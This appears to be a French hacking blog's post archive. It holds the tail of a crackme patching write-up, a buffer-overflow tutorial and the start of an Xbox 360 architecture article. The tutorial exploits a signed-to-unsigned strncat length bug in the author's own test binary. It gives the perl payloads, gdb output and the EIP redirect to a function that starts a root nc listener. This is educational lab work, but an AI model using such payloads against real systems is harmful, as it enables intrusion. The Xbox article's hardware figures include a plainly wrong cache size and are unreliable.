{</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> if ( strcmp(&v67, "admin_r00t") )</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> {</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> result = 69;</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> }</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> else</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> {</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> v10 = tor(&v62);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> printf("%s :)\n", v10);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> result = 69;</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> }</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> }</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> return result;</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="color: #cccccc; font-size: x-small;"><span style="color: red;"> ...</span> </span></b></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"> Voila , nous somme au coeur du problème a présent, j'me suis donc dit que j'allais travailler ça de façon a patcher le binaire pour luifaire cracher son flag et ne plus avoir d'outputs frustrants comme les : </span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #674ea7;">ALERT: You are not welcome.</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">ou encore</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"><span style="color: #674ea7;">It's not so easy Dude !</span> (<i>aprés patching de plusieurs sauts conditionels/call par exemple</i>).</span></div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">Le but recherché étant d'obtenir le flag de validation , j'ai fait ça de façon rapide </span><span style="color: #cccccc;">mais <u>absolument pas esthétique</u> , puristes s'abstenir ! </span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"></span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"> </span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"> Pour y parvenir il ne me resta plus qu'a rechercher certaines fonctions (dont celle qui construisent et donne le précieux sésame) puis a patcher afin de jumper au bon endroit.</span></div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"> Voici quelques une des modifs ainsi effectuées : </span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">Parti de cette instruction <span style="color: red; font-family: "Courier New",Courier,monospace; font-size: x-small;"> jmp loc_8048a47</span> , on jump en <span style="color: red; font-family: "Courier New",Courier,monospace; font-size: x-small;">0x8048a47</span> et on apporte les modifs adéquates.</span></div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">La capture suivante propose 2 vues a savoir a gauche le binaire dans sa version originale , a droite sa version patchée .</span></div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ8im4HpCwPbVuVOPGPKQtnF17YeYOav1oaSB2tVrhqIAm293qnA_mvea5qcREPEeds5nV_zTkzicsEejpFPJScGnLcRoIQdGiaEG3dE2ow6HWZbjBrthBBgikEn9I2VFzkVQQ-FQEsPHJ/s1600/screen1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ8im4HpCwPbVuVOPGPKQtnF17YeYOav1oaSB2tVrhqIAm293qnA_mvea5qcREPEeds5nV_zTkzicsEejpFPJScGnLcRoIQdGiaEG3dE2ow6HWZbjBrthBBgikEn9I2VFzkVQQ-FQEsPHJ/s640/screen1.png" width="640" /></a></div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">La chaine contenue dans <span style="color: red;">strz__s__s__8048bed</span> se trouvait donc etre "<span style="color: orange;">admin_r00t %s %s\n\0</span>" :-^ .</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">Voila , restait alors qu'a chopper le flag et a valider :</span></div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"><span style="color: orange;">sh-3.2$ </span><span style="color: yellow;">./copie\ de\ n00b-login </span></span></div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: yellow;">--- Welcome to 'Epicness Security' systems.</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: yellow;">Insert name: kmkz</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: yellow;">Insert last name: sec0d</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: yellow;">Insert sex: Faible(:P) </span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: yellow;">Inserd birthday: 1337</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: yellow;">Insert passwd: pawned!</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"><span style="color: yellow;">Damn it! SYSTEM FAILURE:<span style="color: red;"> </span></span><span style="color: red;">iTSeeMsThaTWeAreNotEpicnessAtAlL</span></span></div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><a href="http://pastebin.com/NWY4jCH1">Pastebin du dump ASM</a></div><div style="font-family: Times,"Times New Roman",serif;"><a href="http://pastebin.com/zRi90RFM">Pastbin du dump C </a></div>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com1tag:blogger.com,1999:blog-4457623080129847893.post-83500445173468764512010-11-14T23:10:00.008+01:002011-01-06T09:49:44.910+01:00Erreur de Casting ou corruption de la stack en milieu hostile<style type="text/css">
<!-- @page { margin: 2cm } P { margin-bottom: 0.21cm } PRE { font-family: "Liberation Serif" } A:link { so-language: zxx
</style><span style="color: #cccccc;">Salut a tous .</span>
<pre><span style="color: #cccccc;">Actuellement en formation réseau , je n'ai pas pu tenir toute mes promesses concernant ce blog , néanmoins ,</span>
<span style="color: #cccccc;">je vous propose a présent une petite exploitation en milieu hostile (avec SSP et ASLR).</span>
<span style="color: #cccccc;"> Notre objectif du jour sera ,comme souvent, la réécriture d'EIP , grace a un buffer overflow .</span>
<span style="color: #cccccc;">Pour ce faire nous exploiterons une faille de type «transtypage» ou «casting» ,puis nous redirigerons le flot d'exécution</span></pre><pre><span style="color: #cccccc;">en écrasant EIP grace a une erreur dans l'emploi de la fonction C strncat().</span>
<span style="color: #cccccc;">Tout d'abord précisons l'environnement de travail:</span>
<i style="color: red;">root[Casting_error]# uname -a && cat /proc/sys/kernel/randomize_va_space </i>
<i style="color: red;">Linux zenwalk 2.6.33.4 #</i><i style="color: red;"><i style="color: red;">1 SMP PREEMPT Fri May 14 13:02:33 CEST 2010 i686 Intel(R) Pentium(R) 4
CPU 3.06GHz GenuineIntel GNU/Linux </i>
<i style="color: red;">2 </i>
<span style="color: #cccccc;">A présent compilons le binaire de façon suffisament sure pour rentre cette exploitation intéréssante;</span>
<span style="color: #cccccc;">a quoi bon compiler et exploiter des binaires compilés avec -fno-stack-protector pour la énnième fois..</span>
<i style="color: red;">root[Casting_error]#gcc -Wall -Werror-o vuvu vuvu.c</i>
<span style="color: #cccccc;">(On remarquera au passage que malgré les arguments passés, <span style="font-style: italic;">GCC ne renvois aucun warnings</span> lors de la compilation,</span>
<span style="color: #cccccc;">cela démontre que pour lui tout est correctement codé ('fin si on veux..) </span></i><pre><span style="color: #cccccc;"><i style="color: red;">et que toute les fonctions sont utilisées selon les usages ) .</i></span>
<span style="color: #cccccc;"><i style="color: red;">Lançons le afin de le tester un peu:</i></span>
<i style="color: red;"><i style="color: red;">kmkz[Casting_error]# ./vuvu aaaaaaaaaa</i>
<i style="color: red;">Overflow attempt detected!</i>
<span style="color: #cccccc;"> Ok, passons aux choses sérieuses:</span>
<span style="color: #cccccc;">On remarque ici qu'il ne passe pas la condition , en effet , le code source indique que si argv[1] >= 64 ,</span>
<span style="color: #cccccc;">alors on affiche ce message et on quitte le programme.</span>
<span style="color: #cccccc;">Pourtant notre but sera d'accéder a la fonction «serveur» afin de le lancer malgré qu'il ne soit,en théorie, pas accéssible .</span>
<span style="color: #cccccc;">Comment faire?</span>
<span style="color: #cccccc;">Simple me direz-vous , dans un premier temps il faudra bypasser ce contrôle, voici comment on va procéder.</span>
<span style="color: #cccccc;"> Pour commencer on lui indiquera un nombre inférieur à 64 pour tester sa réaction: </span>
<i style="color: red;">kmkz[Casting_error]$ ./vuvu `printf "63"``perl -e 'print "A"x82'`</i>
<i style="color: red;">[+] Welcome on Private Access Plateform (PAP) project</i>
<span style="color: red;"> </span><i style="color: red;">[-] Server unrecheable , please contact the administrator </i>
<i style="color: red;">kmkz[Casting_error]$ </i>
<span style="color: #cccccc;">Bon , maintenant voyons voir comment le binaire réagit avec de l'hexa (on sait que \x3f = 63 , donc \x40 = 64 ) </span></i></pre><pre><span style="color: #cccccc;"><i style="color: red;">on check :</i></span>
<i style="color: red;"><i style="color: red;">kmkz[Casting_error]# ./vuvu `printf "\x40"``perl -e 'print "A"x82'`</i>
<i style="color: red;">[+] Welcome on Private Access Plateform (PAP) project</i>
<span style="color: red;"> </span><i style="color: red;">[-] Server unrecheable , please contact the administrator </i>
<i style="color: red;">Overflow attempt detected!</i>
<span style="color: #cccccc;">Ici on voit bien que la tentative d'overflow échoue car la condition n'est pas vérifiée.</span>
<span style="color: #cccccc;">Essayons maintenant de bypasser ce controle avec une valeur telle que \x80 (<span style="font-weight: bold;">-128</span>) afin de déborder</span>
<span style="color: #cccccc;">et d'écraser EIP.</span>
<span style="color: #cccccc;">Pourquoi \x80?</span>
<span style="color: #cccccc;">Tout simplement une question de Bits :P .</span>
<span style="color: #cccccc;"> Il faut garder a l'esprit la vérification faites par la condition , sachant que le type attendu en 3eme argument</span></i></pre><pre><i style="color: red;"><span style="color: #cccccc;"> qui est défini par le prototype de la fonction strncat() doit etre size_t ,soit unsigned int , un argument comme </span></i></pre><pre><i style="color: red;"><span style="color: #cccccc;">par exemple \x79 nous empècherait de bypasser ce test car les bits seraient alors organisés comme suit:</span>
<b style="color: #ffcc99;">128 - 64 - 32 - 16 - 8 - 4 - 2 – 1 (Bits de l'octet)</b>
<span style="color: #ffcc99;"> </span><b style="color: #ffcc99;">0 1 1 1 1 0 0 1 ( Bits)</b>
<span style="color: #cccccc;">cela renverrait alors une erreur car la valeur serait bien trop grande ! </span>
<span style="color: #cccccc;">x80 quand a lui est un nombre négatif (de \xFF à \x80) et s'étend sur les 24 premiers Bits quand il est de type signé,</span></i></pre><pre><i style="color: red;"><span style="color: #cccccc;"> néanmoins , lorsqu'il est utilisé dans strncat() il devient unsigned , ce qui signifie que les Bits passent a «1»</span></i></pre><pre><i style="color: red;"><span style="color: #cccccc;"> lui donnant ainsi une valeur bien plus grande que 64 , du coup cela génère bien un overflow.</span>
<span style="color: #cccccc;">Allez , maintenant qu'on connait la théorie , place à la pratique :</span>
<i style="color: red;">kmkz[Casting_error]# ./vuvu `printf "\x80"``perl -e 'print "A"x760'` // 760 soyons fou ...</i>
<i style="color: red;">[+] Welcome on Private Access Plateform (PAP) project</i>
<span style="color: red;"> </span><i style="color: red;">[-] Server unrecheable , please contact the administrator </i>
<i style="color: #cccccc;"><span style="color: red;">Erreur de segmentation</span> </i><span style="color: #cccccc;"> <-- Intéréssant , on a pu enfin obtenir un segfault :P</span>
<span style="color: #cccccc;">Allons voir ça de plus prés avec notre ami GDB:</span>
<i style="color: red;">(gdb) r `printf "\x80"``perl -e 'print "A"x82'` //82 car c'est ici la limite du segfault</i>
<i style="color: red;">Starting program: /home/kmkz/EXPLOITATION/Casting_error/vuvu `printf "\x80"``perl -e 'print "A"x82</i>
<i style="color: red;">'`</i>
<i style="color: red;">Program received signal SIGSEGV, Segmentation fault.</i>
<i style="color: red;">0x41414141 in ?? ()</i>
<span style="color: #cccccc;">Regardons ce qui se passe au niveau du code assembleur et des registres : </span>
<span style="color: #cccccc;"> ...</span>
<span style="color: #cccccc;"> <span style="color: red;"> </span></span><i style="color: red;">0x08048580 <+106>: movb $0x0,-0x8(%ebp) </i>
<span style="color: red;"> </span><i style="color: red;">0x08048584 <+110>: cmpb $0x3f,-0x9(%ebp) </i>
<span style="color: red;"> </span><i style="color: red;">0x08048588 <+114>: jle 0x80485ab <function_verif+149> </i>
<i style="color: red;">---Type <return> to continue, or q <return> to quit--- </i>
<span style="color: red;"> </span><i style="color: red;">0x0804858a <+116>: mov 0x80498e0,%eax </i>
<span style="color: red;"> </span><i style="color: red;">0x0804858f <+121>: mov %eax,%edx </i>
<span style="color: red;"> </span><i style="color: red;">0x08048591 <+123>: mov $0x8048758,%eax </i>
<span style="color: #cccccc;"> ...</span>
<span style="color: #cccccc;">Plaçons quelques points d'arrêts pour pouvoir y voir plus clair:</span>
<i style="color: red;">(gdb) b *function_verif+114</i>
<i style="color: red;">Breakpoint 1 at 0x8048588</i>
<i style="color: red;">(gdb) b *function_verif+116</i>
<i style="color: red;">Breakpoint 7 at 0x804858a</i>
<span style="color: #cccccc;">Allez , let's go ! </span>
<i style="color: red;">(gdb) r `printf "\x80"``perl -e 'print "A"x82 . "\00"'`</i>
<i style="color: red;">The program being debugged has been started already.</i>
<i style="color: red;">Start it from the beginning? (y or n) y</i>
<i style="color: red;">Starting program: /home/kmkz/EXPLOITATION/Casting_error/vuvu `printf "\x80"``perl -e 'print "A"x82 . "\00"'`</i>
<i style="color: red;">[+] Welcome on Private Access Plateform (PAP) project</i>
<span style="color: red;"> </span><i style="color: red;">[-] Server unrecheable , please contact the administrator </i>
<i style="color: red;">Breakpoint 1, 0x08048588 in function_verif ()</i>
<span style="color: #cccccc;">On fait un info registers:</span>
<i style="color: red;">(gdb) i r</i>
<i style="color: red;">eax 0x0 0 --> le nullbyte de buff[0],(mov $0x0,%eax)</i>
<i style="color: red;">ecx 0x1 1</i>
<i style="color: red;">edx 0xbffff23f -1073745345</i>
<i style="color: red;">ebx 0x3f 63 --> notre char initialisé à 64 (moins le nullbyte,soit 63) octets</i>
<i style="color: red;">esp 0xbffff1f0 0xbffff1f0</i>
<i style="color: red;">ebp 0xbffff248 0xbffff248</i>
<i style="color: red;">esi 0x0 0 --> Nullbyte de buff[65]</i>
<i style="color: red;">edi 0xbffff23c -1073745348</i>
<i style="color: red;">eip 0x8048588 0x8048588 <function_verif+114></i>
<i style="color: red;">(gdb) c</i>
<i style="color: red;">Continuing.</i>
<i style="color: red;">Program received signal SIGSEGV, Segmentation fault.</i>
<i style="color: red;">0x41414141 in ?? ()</i>
<i style="color: red;">(gdb) i r</i>
<i style="color: red;">eax 0x0 0 --> le nullbyte de buff[0],(mov $0x0,%eax)</i>
<i style="color: red;">ecx 0xffffff7f -128 --> notre argument nécéssaire pour l'overflow (\x80)</i>
<i style="color: red;">edx 0xbffff24e -1073745330</i>
<i style="color: red;">ebx 0x41414141 1094795585</i>
<i style="color: red;">esp 0xbffff250 0xbffff250</i>
<i style="color: red;">ebp 0x41414141 0x41414141</i>
<i style="color: red;">esi 0x0 0 --> Nullbyte de buff[65]</i>
<i style="color: red;">edi 0x41414141 1094795585</i>
<i style="color: red;">eip 0x41414141 0x41414141</i>
<i style="color: red;">(gdb) i s</i>
<i style="color: red;">#0 0x41414141 in ?? ()</i>
<i style="color: red;">#1 0xbfff0041 in ?? ()</i>
<i style="color: red;">Backtrace stopped: previous frame inner to this frame (<b>corrupt stack</b>?)</i>
<span style="color: #cccccc;">Ici on se rend bien compte de l'overflowing de la stack, tentons a présent de l'exploiter mauellement puis </span>
<span style="color: #cccccc;">a l'aide de l'exploit codé a cet effet. </span>
<span style="color: #cccccc;">Exploitation via détournement de fonction (un ret-into_PLT serait a envisagé mais j'ai opté pour cette méthode</span>
<span style="color: #cccccc;">car elle ne nécéssite que peu de connaissance et est relativement simple a pratir du moment ou EIP est </span>
<span style="color: #cccccc;">overwrité): </span>
<i style="color: red;">objdump -d vuvu | grep serveur</i>
<i style="color: red;">080485d4 <serveur>:</i>
<span style="color: #cccccc;">Voilà , l'exploitation peu avoir lieu afin de lancer le serveur soit-disant inaccéssible contruison le avec l'adresse fixée précédemment.</span>
<span style="color: #cccccc;"> 82-5 =77 Octets soit 4 Octets pour l'offset de retour (fonction serveur), 1 pour notre argument hexadécimal et on ajoutera un NullByte </span></i></pre><pre><i style="color: red;"><span style="color: #cccccc;">pour la fin de string (non obligatoire ici , mais plus propre).</span>
<i style="color: red;">(gdb) r `perl -e 'print "\x80" . "A"x77 . "\xd4\x85\x04\x08" . "\00"'`</i>
<i style="color: red;">The program being debugged has been started already.</i>
<i style="color: red;">Start it from the beginning? (y or n) y</i>
<i style="color: red;">Starting program: /home/kmkz/EXPLOITATION/Casting_error/vuvu `perl -e 'print "\x80" . "A"x77 . "\xd4\x85\x04\x08" . "\00"'`</i>
<i style="color: red;">[+] Welcome on Private Access Plateform (PAP) project</i>
<span style="color: red;"> </span><i style="color: red;">[-] Server unrecheable , please contact the administrator </i>
<i style="color: red;">Breakpoint 1, 0x08048588 in function_verif ()</i>
<i style="color: red;">(gdb) c</i>
<i style="color: red;">Continuing.</i>
<i style="color: red;">[+] Activating server on port : 6666 </i>
<span style="color: #cccccc;">Du coté du méchant hacker le serveur est bien lancé , vérifions son fonctionnement et ses droits au cas ou ..: </span>
<span style="color: #cccccc;">...</span>
<b style="color: #ff6600;">tcp 0 0 *:6666 *:* LISTEN root 18892 2786/nc </b>
<span style="color: #cccccc;">...</span>
<span style="color: #cccccc;">L'exploitation a bien fonctionné , voyons maintenant avec notre exploit .</span>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiidZsNtEuobEslXepYftg638UzK7tFQqY9DjvPTbz2RWZqKMEUdraKjqXbhfO3biskKtWqU4IGS11BubDFjiYOZljM8qW7PNUweJEedOwQ2Sb370vI8jxxsmF10_8KBmyD1PNy1X2tNajb/s1600/screen_xploit.gif" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5539532341967467858" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiidZsNtEuobEslXepYftg638UzK7tFQqY9DjvPTbz2RWZqKMEUdraKjqXbhfO3biskKtWqU4IGS11BubDFjiYOZljM8qW7PNUweJEedOwQ2Sb370vI8jxxsmF10_8KBmyD1PNy1X2tNajb/s320/screen_xploit.gif" style="cursor: pointer; display: block; height: 122px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a>
<span style="color: #cccccc;">Voilà , j'espère que cela vous donnera des idées simpa , </span></i></pre><pre><i style="color: red;"><span style="color: #cccccc;">il me reste plus qu'à vous dire a bientôt pour de nouvelles aventures.</span>
<span style="color: #cccccc;">\o>
Links:
</span></i></pre><i style="color: red;"><a href="http://membres.lycos.fr/profil4/kmkz/Exploits/exploit"><span style="color: #3366ff;">Exploit</span></a>
<span style="color: #3366ff;"> </span>
<a href="http://membres.lycos.fr/profil4/kmkz/Exploits/vuvu.c"><span style="color: #3366ff;">Binaire(source vuvu.c)</span></a>
<a href="http://membres.lycos.fr/profil4/kmkz/Exploits/Exploitation_article.pdf"><span style="color: #3366ff;">Article PDF</span></a>
</i></pre>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-5031609234664713722010-08-04T17:14:00.002+02:002010-08-04T17:35:48.067+02:00Xbox 360 Security : Chapter 1 <!-- ======================================================= --> <!-- Created by AbiWord, a free, Open Source wordprocessor. --> <!-- For more information visit http://www.abisource.com. --> <!-- ======================================================= --> <meta equiv="content-type" content="text/html;charset=UTF-8"> <title></title> <style type="text/css"> <!-- #toc, .toc, .mw-warning { border: 1px solid #aaa; background-color: #f9f9f9; padding: 5px; font-size: 95%; } #toc h2, .toc h2 { display: inline; border: none; padding: 0; font-size: 100%; font-weight: bold; } #toc #toctitle, .toc #toctitle, #toc .toctitle, .toc .toctitle { text-align: center; } #toc ul, .toc ul { list-style-type: none; list-style-image: none; margin-left: 0; padding-left: 0; text-align: left; } #toc ul ul, .toc ul ul { margin: 0 0 0 2em; } #toc .toctoggle, .toc .toctoggle { font-size: 94%; }@media print, projection, embossed { body { padding-top:1in; padding-bottom:1in; padding-left:1in; padding-right:1in; } } body { font-family:'Times New Roman'; font-variant:normal; text-indent:0in; widows:2; font-style:normal; font-weight:normal; text-decoration:none; color:#000000; text-align:left; font-size:12pt; } table { } td { border-collapse:collapse; text-align:left; vertical-align:top; } p, h1, h2, h3, li { color:#000000; font-family:'Times New Roman'; font-size:12pt; text-align:left; vertical-align:normal; } --> </style> <div> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">Me revoila ;-) .</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">Depuis plusieurs mois , la <span style="font-style: italic;">3LRVS</span> avait debute des recherches sur la securite des consoles Xbox360.</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">Malheureusement , faute de temps et surtout de matos , nous avions mis de coté ces recherches , attendant de pouvoir avancer de f<span lang="fr-FR">açon plus "concrete".</span></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"><span lang="fr-FR">C'est chose faite , la <span style="font-style: italic;">3LRVS</span> va reprendre du service \o/ , voila donc le moment opportunt pour vous proposer un article condensé sur l'architecture et les bases de la securite sur ce type de machines en attendant nos premiere trouvailles (enfin , espérons le :P ).</span></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"><span lang="fr-FR">Let's go :</span></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(255, 204, 102); font-weight: bold;">[*]Caractéristiques de l'architecture de la Xbox 360 :</p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">- Processeur (XCPU Xenon): </p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> PowerPC G5 d'IBM x64 3-cores cadence a 3.2Ghz (1,6 Ghz en reel) .</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> Multithreads (2 threads [SMT] par core : 1 en FPU + 1 en VMX) </p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> 192Mo de cache total en L1 (level 1 ) et 1Mo en L2 (mode utilisateur)</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> <span style="color: rgb(255, 0, 0);">*Soit: 32Kb en cache (instructions) + 32Kb en cache (donnees) , en Level 1</span> <span style="color: rgb(255, 0, 0);">(kernel mode).</span></p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">- Memoire vive (RAM): 512 GDDR3 - 700 Mhz partagee avec le cpu Bande passante de 21.6 Go/s</p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">- Architecture : PPC Big Endian (IBM)</p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">( <a href="http://fr.wikipedia.org/wiki/Xenon_%28processeur%29">http://fr.wikipedia.org/wiki/Xenon_(processeur)</a> )</p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(255, 204, 102); font-weight: bold;">[*] Prerequis :</p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"><span style="font-weight: bold;">- FPU</span> (Floating Point Unit) :</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> Est un processeur dédié spécialement conçu pour effectuer des opérations sur des nombres à virgule flottante</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">( <a style="color: rgb(51, 51, 255);" href="http://fr.wikipedia.org/wiki/Unit%C3%A9_de_calcul_en_virgule_flottan">http://fr.wikipedia.org/wiki/Unit%C3%A9_de_calcul_en_virgule_flottan</a><span style="color: rgb(51, 51, 255);">te <span style="color: rgb(204, 204, 204);">)</span></span></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"><span style="font-weight: bold;">- VMX:</span> les VMX implémentent des instructions ternaires spécifiant deux registres source et un registre destination, ainsi qu’un registre de modification optionnel.</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> Ils sont utilisés notament dans le cadre d’additions ou de multiplications (ici étendu a 128 Bits) a raison de 2 cycles gérant 4 instructions chacun.</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">(<a href="http://fr.wikipedia.org/wiki/AltiVec"> http://fr.wikipedia.org/wiki/AltiVec </a>)</p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"><span style="font-weight: bold;">- SIMD:</span> le SIMD regroupe les deux coprocesseurs vectoriels VMX128 (similaires à AltiVec) avec 2 bancs de registres (128×128 bits) pour chaques coeurs.</p> <p style="color: rgb(204, 204, 204);"> </p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204); font-weight: bold;">- SMT (Symetric Material Thread): </p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> Systeme de multi threads symétriques </p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> (2 par coeurs soit 6 threads au total pour les jeux)</p> <p style="color: rgb(204, 204, 204);"> </p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> <span style="font-weight: bold;">- eFuse :</span></p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);">Securite sur le bootloader permettant de tester la présence du firmware proprietaire .</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> Capacité: 768 bits -</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"> <span style="color: rgb(255, 0, 0);">Patche depuis la version (ou MaJ) kernel >= 4552</span> (afin d'eviter les downgrade , voir la partie "securite").</p> <p dir="ltr" style="text-align: left; color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p style="color: rgb(204, 204, 204);"></p> <p dir="ltr" style="text-align: left; color: rgb(255, 204, 102); font-weight: bold;">[+]Schema simplifié du processeur PowerPC (Xenon) d'IBM utilisé:</p> <p></p> <p></p> <p></p> <p></p> <p></p> <p></p> <p></p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNEg15VgTjX6zRQWOnZ_MbgVRRuYPqqL9oFnLhP0UjaduRmcJLZeE7ETjKu6K5cHJG1wx9v2QitBiytLL37r1zAPYQ7JLq5cvely0tFEJSoUhoOh9XMAuy4MAtOqnuSZsEPLNBn_pTJTCz/s1600/Xbox_Architecture_large.gif"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 280px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNEg15VgTjX6zRQWOnZ_MbgVRRuYPqqL9oFnLhP0UjaduRmcJLZeE7ETjKu6K5cHJG1wx9v2QitBiytLL37r1zAPYQ7JLq5cvely0tFEJSoUhoOh9XMAuy4MAtOqnuSZsEPLNBn_pTJTCz/s320/Xbox_Architecture_large.gif" alt="" id="BLOGGER_PHOTO_ID_5501572896678169698" border="0" /></a><p dir="ltr" style="text-align: left;">
